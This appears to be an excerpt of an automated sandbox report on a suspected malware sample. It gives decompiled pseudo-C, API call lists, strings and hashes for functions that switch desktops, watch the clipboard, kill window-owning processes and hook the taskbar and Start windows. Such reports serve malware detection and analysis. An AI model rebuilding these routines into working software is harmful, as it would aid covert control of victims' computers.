				E00C82F5C(__eflags, __rcx, __rcx, __rsi, __r8, __r9);
				E00C83DF0(_t27, _t28, _t28);
				 *(_t28 + 0x160) = 1;
				while(WaitForSingleObject() == 0x102) {
					r9d = 0;
					r8d = 0;
					_t14 = GetMessageA(??, ??, ??, ??);
					__eflags = _t14;
					if(_t14 != 0) {
						TranslateMessage();
						DispatchMessageA(??);
						continue;
					}
					break;
				}
				if( *((intOrPtr*)(_t28 + 0x178)) != 0) {
					DestroyWindow();
				}
				_t15 = E00C83E78(_t28);
				 *(_t28 + 0x160) =  *(_t28 + 0x160) & 0x00000000;
				return _t15;
			}

0x00c83940
0x00c83946
0x00c83950
0x00c83959
0x00c83961
0x00c83966
0x00c8399f
0x00c83972
0x00c8397a
0x00c8397f
0x00c83985
0x00c83987
0x00c8398e
0x00c83999
0x00000000
0x00c83999
0x00000000
0x00c83987
0x00c839bc
0x00c839be
0x00c839be
0x00c839c7
0x00c839cc
0x00c839d8

APIs

SetThreadDesktop.USER32 ref: 00C83950

Part of subcall function 00C82F5C: GetModuleHandleA.KERNEL32 ref: 00C82FA7
Part of subcall function 00C82F5C: RegisterClassA.USER32 ref: 00C82FCD
Part of subcall function 00C82F5C: CreateFontA.GDI32 ref: 00C83016
Part of subcall function 00C82F5C: GetWindowRect.USER32 ref: 00C8307E

Part of subcall function 00C83DF0: GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C83966), ref: 00C83E01
Part of subcall function 00C83DF0: CreateWindowExA.USER32 ref: 00C83E3D
Part of subcall function 00C83DF0: SetClipboardViewer.USER32(?,?,?,?,?,?,?,?,?,?,?,00C83966), ref: 00C83E52

GetMessageA.USER32 ref: 00C8397F
TranslateMessage.USER32 ref: 00C8398E
DispatchMessageA.USER32 ref: 00C83999
WaitForSingleObject.KERNEL32 ref: 00C839A5
DestroyWindow.USER32 ref: 00C839BE

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MessageWindow$CreateHandleModule$ClassClipboardDesktopDestroyDispatchFontObjectRectRegisterSingleThreadTranslateViewerWait
String ID:
API String ID: 2444732902-0
Opcode ID: 7fccda8fa386c8fb0796f1e13cdcea64bada8cf420905afb47aa170bcedefb7e
Instruction ID: 7bea1da6a44fc036155500c5d6b49874d7e1cd5954b1a56373c1db0bb63d8bba
Opcode Fuzzy Hash: 7fccda8fa386c8fb0796f1e13cdcea64bada8cf420905afb47aa170bcedefb7e
Instruction Fuzzy Hash: 5E012C3261098082FB20BF31E8597692371FB99F49F986221E94F46554CF38C249C708

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E750, Relevance: 9.0, APIs: 6, Instructions: 31synchronizationthreadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32 ref: 00C7E75F
GetCurrentProcessId.KERNEL32 ref: 00C7E769
OpenProcess.KERNEL32 ref: 00C7E77E
TerminateProcess.KERNEL32 ref: 00C7E791
WaitForSingleObject.KERNEL32 ref: 00C7E79F
CloseHandle.KERNEL32 ref: 00C7E7A8

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$CloseCurrentHandleObjectOpenSingleTerminateThreadWaitWindow
String ID:
API String ID: 127232891-0
Opcode ID: 2c4dcb04ce26b1b6f583cc76be3a49e1331b19ea2b6b309021377cc26d99b77e
Instruction ID: cf1afa57161ef6700a4b6b3b220564603eafcccf9904083c6198e22527447f25
Opcode Fuzzy Hash: 2c4dcb04ce26b1b6f583cc76be3a49e1331b19ea2b6b309021377cc26d99b77e
Instruction Fuzzy Hash: FEF03076715B4186FB18DB26EC04B296361AF88B81F88D674D90B46B64EF3CC989C714

Uniqueness

Uniqueness Score: -1.00%

Function 00C7CA1C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00C7CA1C(void* __ecx, void* __edx, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __r8, void* __r9) {
				void* __rbp;
				intOrPtr _t56;
				void* _t65;
				signed char _t66;
				intOrPtr _t68;
				intOrPtr _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				intOrPtr _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				intOrPtr _t90;
				void* _t101;
				intOrPtr* _t104;
				void* _t129;
				void* _t132;
				void* _t134;
				void* _t135;
				void* _t145;
				void* _t148;
				void* _t152;

				_t140 = __r9;
				_t126 = __rdi;
				_t102 = __rbx;
				_t101 = _t134;
				 *((long long*)(_t101 + 8)) = __rbx;
				 *((long long*)(_t101 + 0x10)) = __rsi;
				 *((long long*)(_t101 + 0x20)) = __rdi;
				 *((long long*)(_t101 + 0x18)) = __r8;
				_t132 = _t101 - 0x57;
				_t135 = _t134 - 0x100;
				_t153 = __rcx + 0x88;
				_t148 = __rcx;
				_t90 = 0;
				_t145 = __r9;
				_t129 = __rdx;
				r14d = 0;
				if(E00C7C050(_t101, __rbx, __rcx + 0x88, __rdx, __rdx, _t152) == 0 || E00C7C134(_t102, _t129) == 0) {
					L6:
					_t56 = 0;
					goto L7;
				} else {
					 *((intOrPtr*)(_t135 + 0x30)) = 0x3c;
					GetWindowInfo(??, ??);
					if(( *(_t132 - 0x7d) & 0x0000000f) != 7 || E00C7B9E4() != 0x3daaa90b) {
						_t104 =  *((intOrPtr*)(_t132 + 0x7f));
						__eflags =  *(_t135 + 0x3c) -  *_t104;
						if( *(_t135 + 0x3c) <=  *_t104) {
							goto L6;
						}
						__eflags =  *(_t135 + 0x34) -  *(_t104 + 8);
						if( *(_t135 + 0x34) >=  *(_t104 + 8)) {
							goto L6;
						}
						__eflags =  *(_t135 + 0x40) -  *((intOrPtr*)(_t104 + 4));
						if( *(_t135 + 0x40) <=  *((intOrPtr*)(_t104 + 4))) {
							goto L6;
						}
						__eflags =  *(_t135 + 0x38) -  *((intOrPtr*)(_t104 + 0xc));
						if( *(_t135 + 0x38) >=  *((intOrPtr*)(_t104 + 0xc))) {
							goto L6;
						}
						_t65 = E00C6ADD8();
						__eflags = _t65 - 5;
						if(_t65 <= 5) {
							L16:
							asm("movups xmm0, [esp+0x34]");
							asm("movdqu [ebp-0x61], xmm0");
							_t66 = E00C7BB64(_t101, _t104, _t153, _t129, _t140);
							r15d = _t66;
							__imp__GetClassLongPtrA();
							__eflags = _t66 & 0x000000c0;
							if((_t66 & 0x000000c0) != 0) {
								L20:
								 *((intOrPtr*)(_t135 + 0x20)) = 1;
								E00C7C8D8(_t104, _t148, _t129, _t126, _t129, _t145, _t132 - 0x61);
								L21:
								_t83 =  *((intOrPtr*)(_t104 + 0xc));
								__eflags =  *(_t135 + 0x40) - _t83;
								if( *(_t135 + 0x40) > _t83) {
									_t85 = _t83 + 0xfffffffe;
									 *(_t135 + 0x40) = _t85;
									__eflags =  *((intOrPtr*)(_t104 + 0x18)) - _t90;
									if( *((intOrPtr*)(_t104 + 0x18)) != _t90) {
										_t86 = _t85 +  *((intOrPtr*)(_t104 + 0x20)) -  *((intOrPtr*)(_t104 + 0x28));
										__eflags = _t86;
										 *(_t135 + 0x40) = _t86;
									}
								}
								_t68 =  *((intOrPtr*)(_t104 + 4));
								__eflags =  *(_t135 + 0x38) - _t68;
								if( *(_t135 + 0x38) < _t68) {
									r14d = _t68;
									r14d = r14d -  *(_t135 + 0x38);
									r14d = r14d + 2;
									_t74 = _t68 + 2;
									__eflags = _t74;
									 *(_t135 + 0x38) = _t74;
								}
								_t84 =  *(_t104 + 8);
								__eflags =  *(_t135 + 0x3c) - _t84;
								if( *(_t135 + 0x3c) > _t84) {
									_t84 = _t84 + 0xfffffffe;
									 *(_t135 + 0x3c) = _t84;
									__eflags =  *((intOrPtr*)(_t104 + 0x18)) - _t90;
									if( *((intOrPtr*)(_t104 + 0x18)) != _t90) {
										_t84 = _t84 +  *((intOrPtr*)(_t104 + 0x2c)) -  *((intOrPtr*)(_t104 + 0x34));
										__eflags = _t84;
										 *(_t135 + 0x3c) = _t84;
									}
								}
								_t69 =  *_t104;
								__eflags =  *(_t135 + 0x34) - _t69;
								if( *(_t135 + 0x34) < _t69) {
									_t90 = _t69 -  *(_t135 + 0x34) + 2;
									_t71 = _t69 + 2;
									__eflags = _t71;
									 *(_t135 + 0x34) = _t71;
								}
								asm("movups xmm0, [esp+0x34]");
								 *((intOrPtr*)(_t135 + 0x28)) = r14d;
								 *((intOrPtr*)(_t135 + 0x20)) = _t90;
								asm("movdqu [ebp-0x61], xmm0");
								E00C7CC38(_t84, 0xffffffe6,  *((intOrPtr*)(_t132 + 0x6f)), _t145, _t132 - 0x61);
								goto L8;
							}
							__eflags = r15d & 0x00006040;
							if((r15d & 0x00006040) != 0) {
								goto L20;
							}
							r8d = 0;
							_t77 = E00C7D384(_t104, _t129, _t145, _t126, _t129, _t132);
							__eflags = _t77;
							if(_t77 != 0) {
								goto L21;
							}
							goto L6;
						}
						__eflags =  *((intOrPtr*)(_t104 + 0x58)) - _t90;
						if( *((intOrPtr*)(_t104 + 0x58)) != _t90) {
							goto L16;
						}
						E00C7BB64(_t101, _t104, _t153, _t129, _t140);
						asm("bt eax, 0xf");
						if(__eflags >= 0) {
							goto L8;
						}
						goto L16;
					} else {
						r8d = 0x80;
						if(GetWindowTextA(??, ??, ??) != 0) {
							L8:
							_t56 = 1;
							L7:
							return _t56;
						} else {
							ShowWindow();
							goto L6;
						}
					}
				}
			}

0x00c7ca1c
0x00c7ca1c
0x00c7ca1c
0x00c7ca1c
0x00c7ca1f
0x00c7ca23
0x00c7ca27
0x00c7ca2b
0x00c7ca38
0x00c7ca3c
0x00c7ca43
0x00c7ca4a
0x00c7ca4d
0x00c7ca52
0x00c7ca55
0x00c7ca58
0x00c7ca62
0x00c7cac1
0x00c7cac1
0x00000000
0x00c7ca70
0x00c7ca75
0x00c7ca80
0x00c7ca8e
0x00c7caeb
0x00c7caf1
0x00c7caf5
0x00000000
0x00000000
0x00c7cafa
0x00c7cafe
0x00000000
0x00000000
0x00c7cb03
0x00c7cb07
0x00000000
0x00000000
0x00c7cb0c
0x00c7cb10
0x00000000
0x00000000
0x00c7cb12
0x00c7cb17
0x00c7cb1a
0x00c7cb32
0x00c7cb32
0x00c7cb3d
0x00c7cb42
0x00c7cb4f
0x00c7cb52
0x00c7cb58
0x00c7cb5a
0x00c7cb7c
0x00c7cb80
0x00c7cb91
0x00c7cb96
0x00c7cb96
0x00c7cb99
0x00c7cb9d
0x00c7cb9f
0x00c7cba2
0x00c7cba6
0x00c7cba9
0x00c7cbb1
0x00c7cbb1
0x00c7cbb3
0x00c7cbb3
0x00c7cba9
0x00c7cbb7
0x00c7cbba
0x00c7cbbe
0x00c7cbc0
0x00c7cbc3
0x00c7cbc8
0x00c7cbcc
0x00c7cbcc
0x00c7cbcf
0x00c7cbcf
0x00c7cbd3
0x00c7cbd6
0x00c7cbda
0x00c7cbdc
0x00c7cbdf
0x00c7cbe3
0x00c7cbe6
0x00c7cbee
0x00c7cbee
0x00c7cbf0
0x00c7cbf0
0x00c7cbe6
0x00c7cbf4
0x00c7cbf6
0x00c7cbfa
0x00c7cc02
0x00c7cc05
0x00c7cc05
0x00c7cc08
0x00c7cc08
0x00c7cc0c
0x00c7cc19
0x00c7cc24
0x00c7cc28
0x00c7cc2d
0x00000000
0x00c7cc2d
0x00c7cb5c
0x00c7cb63
0x00000000
0x00000000
0x00c7cb65
0x00c7cb6e
0x00c7cb73
0x00c7cb75
0x00000000
0x00000000
0x00000000
0x00c7cb77
0x00c7cb1c
0x00c7cb1f
0x00000000
0x00000000
0x00c7cb27
0x00c7cb2c
0x00c7cb30
0x00000000
0x00000000
0x00000000
0x00c7ca9f
0x00c7ca9f
0x00c7cab4
0x00c7cae4
0x00c7cae4
0x00c7cac3
0x00c7cae3
0x00c7cab6
0x00c7cabb
0x00000000
0x00c7cabb
0x00c7cab4
0x00c7ca8e

APIs

Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093

Part of subcall function 00C7C134: IsWindowVisible.USER32 ref: 00C7C141
Part of subcall function 00C7C134: GetWindowLongPtrA.USER32 ref: 00C7C153

GetWindowInfo.USER32 ref: 00C7CA80

Part of subcall function 00C7B9E4: GetClassNameA.USER32 ref: 00C7B9F6

GetWindowTextA.USER32 ref: 00C7CAAC
ShowWindow.USER32 ref: 00C7CABB
GetClassLongPtrA.USER32 ref: 00C7CB52

Strings

<, xrefs: 00C7CA75

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$ClassLong$AncestorInfoNameShowTextVisible
String ID: <
API String ID: 2975856901-4251816714
Opcode ID: 9b82b624594f61a8366c54947085650309c2348102d45d5ce46adddef32f2801
Instruction ID: 0bc2cb3092c345e7102713fa601284d934539b11716550311a8ea685605f3240
Opcode Fuzzy Hash: 9b82b624594f61a8366c54947085650309c2348102d45d5ce46adddef32f2801
Instruction Fuzzy Hash: 6151C073A14641CBD720CF3AD48166E77A1F394F98F54912AFE5A87B08DB38C942DB00

Uniqueness

Uniqueness Score: -1.00%

Function 00C622A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,00C6249C,?,?,00000008,00C633D0,?,?,00000000,00C63286), ref: 00C622BE
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,00C6249C,?,?,00000008,00C633D0,?,?,00000000,00C63286), ref: 00C62365
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00C6249C,?,?,00000008,00C633D0,?,?,00000000,00C63286), ref: 00C62373

Strings

ntdsapi.dll, xrefs: 00C6235B
NTDLL.DLL, xrefs: 00C622B7

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Library$FreeHandleLoadModule
String ID: NTDLL.DLL$ntdsapi.dll
API String ID: 2140536961-4180381668
Opcode ID: aef9b25d979f61c625d5f6bad82629806db19e43df282c582d9b0431258ab30d
Instruction ID: ebb21f5b6d586207b4868e4b80757adf109f916d9f8b6aa723e59467a6d7d288
Opcode Fuzzy Hash: aef9b25d979f61c625d5f6bad82629806db19e43df282c582d9b0431258ab30d
Instruction Fuzzy Hash: 99316932A01F408AEF108F65E8803AD33A8F748BA8F444626DF5D13BA8EF38C555C350

Uniqueness

Uniqueness Score: -1.00%

Function 00C6242C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00C6242C(long long __rax, long long __rbx, long long __rcx, long long __rdx, long long __rsi, long long __rbp, long long* __r8, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				void* _t19;
				long long* _t29;
				long long _t33;

				_t25 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t36 = __r8;
				_t38 = __rdx;
				_t41 = __rcx;
				_t19 = 1;
				if(GetVersion() < 6) {
					if( *0xc95668 != 0) {
						L6:
						E00C61E70();
						if(_t25 == 0) {
							_t19 = 8;
						} else {
							 *((long long*)(_t25 + 8)) = _t25;
							 *_t25 = _t25;
							 *((long long*)(_t25 + 0x10)) = _t41;
							 *((long long*)(_t25 + 0x18)) = _t38;
							 *_t36 = _t25;
							_t33 =  *0xc95668; // 0x0
							_t29 =  *((intOrPtr*)(_t33 + 8));
							 *_t25 = _t33;
							 *((long long*)(_t25 + 8)) = _t29;
							 *_t29 = _t25;
							 *((long long*)(_t33 + 8)) = _t25;
							goto L8;
						}
					} else {
						E00C622A0(__rax, __rbx, __r8, __rdx);
						 *0xc95668 = _t25;
						if(_t25 != 0) {
							goto L6;
						}
					}
				} else {
					GetModuleHandleW();
					GetProcAddress(??, ??);
					if(__rax != 0 &&  *((long long*)(__rax))() == 0) {
						L8:
						_t19 = 0;
					}
				}
				return _t19;
			}

0x00c6242c
0x00c6242c
0x00c62431
0x00c62436
0x00c62440
0x00c62443
0x00c62446
0x00c62449
0x00c62456
0x00c62495
0x00c624a8
0x00c624ad
0x00c624b5
0x00c624e6
0x00c624b7
0x00c624b7
0x00c624bb
0x00c624be
0x00c624c2
0x00c624c6
0x00c624c9
0x00c624d0
0x00c624d4
0x00c624d7
0x00c624db
0x00c624de
0x00000000
0x00c624de
0x00c62497
0x00c62497
0x00c6249c
0x00c624a6
0x00000000
0x00000000
0x00c624a6
0x00c62458
0x00c6245f
0x00c6246f
0x00c62478
0x00c624e2
0x00c624e2
0x00c624e2
0x00c62478
0x00c62501

APIs

GetVersion.KERNEL32(?,?,00000008,00C633D0,?,?,00000000,00C63286,?,?,?,?,?,00C618B2), ref: 00C6244E
GetModuleHandleW.KERNEL32(?,?,00000008,00C633D0,?,?,00000000,00C63286,?,?,?,?,?,00C618B2), ref: 00C6245F
GetProcAddress.KERNEL32(?,?,00000008,00C633D0,?,?,00000000,00C63286,?,?,?,?,?,00C618B2), ref: 00C6246F

Strings

LdrRegisterDllNotification, xrefs: 00C62468
NTDLL.DLL, xrefs: 00C62458

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrRegisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3368964806
Opcode ID: 0d326aa8212704a4f0072a2ca969c150ffa01dbd65b75f1a0928636b431914b6
Instruction ID: 94f50c0a2bd9befc8134c1cd68cd728f0dd139c55ff3172abc03ea55d7ff5039
Opcode Fuzzy Hash: 0d326aa8212704a4f0072a2ca969c150ffa01dbd65b75f1a0928636b431914b6
Instruction Fuzzy Hash: 4F21F931216F4085FB659F55FCD472976A4FB88B80F98C129EA8D43B65EF38C9A6C300

Uniqueness

Uniqueness Score: -1.00%

Function 00C77D10, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00C6582C), ref: 00C77D52
HeapAlloc.KERNEL32(?,?,?,00C6582C), ref: 00C77D72
SetLastError.KERNEL32(?,?,?,00C6582C), ref: 00C77D83
wsprintfW.USER32 ref: 00C77D9D

Strings

%S_%s, xrefs: 00C77D90

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocErrorHeapLastlstrlenwsprintf
String ID: %S_%s
API String ID: 2242173294-1352953545
Opcode ID: 758b194c8c9125576135f9e4416707bc239b554ab598bbe79c3c37455ff30f9f
Instruction ID: bc5aadd2fcc3e4de33e3f4eb5d6a527b2b467b78ac23dce89c8d604886c71a54
Opcode Fuzzy Hash: 758b194c8c9125576135f9e4416707bc239b554ab598bbe79c3c37455ff30f9f
Instruction Fuzzy Hash: 8101C4A5715B8086EF24CB13F804B597361FB98FD0F48C1319E0A07B24EE39C585C704

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B290, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37
sleepCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00C7B290(void* __edx, long long __rax, long long __rbx, void* __rcx, void* __r8, long long _a8) {
				long long _t17;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t31;

				_t31 = __r8;
				_t20 = __rcx;
				_t18 = __rbx;
				_t17 = __rax;
				_a8 = __rbx;
				_t25 = __rcx;
				while(1) {
					r8d = 0;
					E00C7B940(_t17, _t18, _t20, "Shell_TrayWnd", _t26, _t27, _t31);
					_t18 = _t17;
					if(_t17 != 0) {
						break;
					}
					if( *((intOrPtr*)(_t25 + 0x224)) != 0) {
						goto L7;
					} else {
						Sleep();
						continue;
					}
					while(1) {
						L7:
						r8d = 0;
						E00C7B940(_t17, _t18, _t18, "Start", _t26, _t27, _t31);
						if(_t17 != 0) {
							break;
						}
						if( *((intOrPtr*)(_t25 + 0x224)) == 0) {
							Sleep();
							continue;
						}
						break;
					}
					__imp__SetWindowLongPtrA();
					 *0xc95868 = _t17;
					return 0;
					goto L7;
				}
				goto L7;
			}

0x00c7b290
0x00c7b290
0x00c7b290
0x00c7b290
0x00c7b290
0x00c7b29a
0x00c7b2b3
0x00c7b2b3
0x00c7b2bf
0x00c7b2c4
0x00c7b2ca
0x00000000
0x00000000
0x00c7b2a6
0x00000000
0x00c7b2a8
0x00c7b2ad
0x00000000
0x00c7b2ad
0x00c7b2e2
0x00c7b2e2
0x00c7b2e2
0x00c7b2ef
0x00c7b2f7
0x00000000
0x00000000
0x00c7b2d5
0x00c7b2dc
0x00000000
0x00c7b2dc
0x00000000
0x00c7b2d5
0x00c7b308
0x00c7b313
0x00c7b321
0x00000000
0x00c7b321
0x00000000

APIs

Part of subcall function 00C7B940: FindWindowExA.USER32 ref: 00C7B986

Sleep.KERNEL32 ref: 00C7B2AD
Sleep.KERNEL32 ref: 00C7B2DC
SetWindowLongPtrA.USER32 ref: 00C7B308

Strings

Shell_TrayWnd, xrefs: 00C7B2B6
Start, xrefs: 00C7B2E5

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: SleepWindow$FindLong
String ID: Shell_TrayWnd$Start
API String ID: 1352427482-2327449929
Opcode ID: 747d2496986b78d46f8b372cd796eb1e63c21de13470e842e6053b739d67fcf5
Instruction ID: de8a8f2bfe82bfd8914eedcb5be4d69fb0623d0e1fbb8d6a9fd88fa3cb18fc40
Opcode Fuzzy Hash: 747d2496986b78d46f8b372cd796eb1e63c21de13470e842e6053b739d67fcf5
Instruction Fuzzy Hash: 2501D12130374592FF286BA2F41876A23A0EB08750F94D229AA2E067A5EF3CC894C704

Uniqueness

Uniqueness Score: -1.00%

Function 00C64FAC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,00C6180D,?,?,?,00C61F7A,?,?,?,00C6203D), ref: 00C64FC0
lstrcpyA.KERNEL32(?,?,?,00C6180D,?,?,?,00C61F7A,?,?,?,00C6203D), ref: 00C64FDC
StrRChrA.SHLWAPI(?,?,?,00C6180D,?,?,?,00C61F7A,?,?,?,00C6203D), ref: 00C64FEB
lstrcatA.KERNEL32(?,?,?,00C6180D,?,?,?,00C61F7A,?,?,?,00C6203D), ref: 00C65018

Strings

.dll, xrefs: 00C6500B

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcatlstrcpylstrlen
String ID: .dll
API String ID: 3050337572-2738580789
Opcode ID: 30c8a72433948d15194de40ff46092b7d00467e666fc6ad453ebacbd6cb0bf76
Instruction ID: 939fe1550c0d38945c0320a7cc88e8f0eec8ba13aa031cfb470d907c0ad3b25e
Opcode Fuzzy Hash: 30c8a72433948d15194de40ff46092b7d00467e666fc6ad453ebacbd6cb0bf76
Instruction Fuzzy Hash: 8301D651701A4181FF358F56D88572D6260AF48BA0F98C334C92A03BE0EE7CC849C345

Uniqueness

Uniqueness Score: -1.00%

Function 00C83DF0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35clipboardCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C83966), ref: 00C83E01
CreateWindowExA.USER32 ref: 00C83E3D
SetClipboardViewer.USER32(?,?,?,?,?,?,?,?,?,?,?,00C83966), ref: 00C83E52
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C83966), ref: 00C83E61

Strings

{FB43697C-B6AB-5C0E-7015-A419220F76B3}, xrefs: 00C83E0C

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClipboardCreateErrorHandleLastModuleViewerWindow
String ID: {FB43697C-B6AB-5C0E-7015-A419220F76B3}
API String ID: 123401665-2817704424
Opcode ID: 95b70290efa8716d8227e3029f705f588282c281fd8775958b350c6d828a669a
Instruction ID: de04a214d09e608fdfaabcf53501513b60e02afa9f497ca88647077f909ee5d2
Opcode Fuzzy Hash: 95b70290efa8716d8227e3029f705f588282c281fd8775958b350c6d828a669a
Instruction Fuzzy Hash: 24012C32609B8487E764CF68F48475AB7E0F748B90F548629EB8983F14EF78C554CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C839DC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34registryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C839F7
GetTickCount.KERNEL32 ref: 00C839FC

Part of subcall function 00C77DBC: wsprintfA.USER32 ref: 00C77E0C

GetModuleHandleA.KERNEL32 ref: 00C83A31
RegisterClassA.USER32 ref: 00C83A53

Strings

{FB43697C-B6AB-5C0E-7015-A419220F76B3}, xrefs: 00C83A02

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClassCountHandleModuleRegisterTickmemsetwsprintf
String ID: {FB43697C-B6AB-5C0E-7015-A419220F76B3}
API String ID: 2277763089-2817704424
Opcode ID: 05fd34822b9b8c801c483925a43b4fb8f34636bd15353b0851566908594a0575
Instruction ID: 6b2ed4c74a30eaf722f3b84110f9d51f54e99fff25fd2e424b9033d46d24b465
Opcode Fuzzy Hash: 05fd34822b9b8c801c483925a43b4fb8f34636bd15353b0851566908594a0575
Instruction Fuzzy Hash: BF016932E20B90DEF700CBB0E8493EC33B1F754B69F908219DA5966D58DFB48159CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00C623B4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,?,00C95A70,00C62ABC,?,?,?,00C62832,?,?,?,?,00C62147), ref: 00C623C6
GetModuleHandleW.KERNEL32(?,?,00C95A70,00C62ABC,?,?,?,00C62832,?,?,?,?,00C62147), ref: 00C623D7
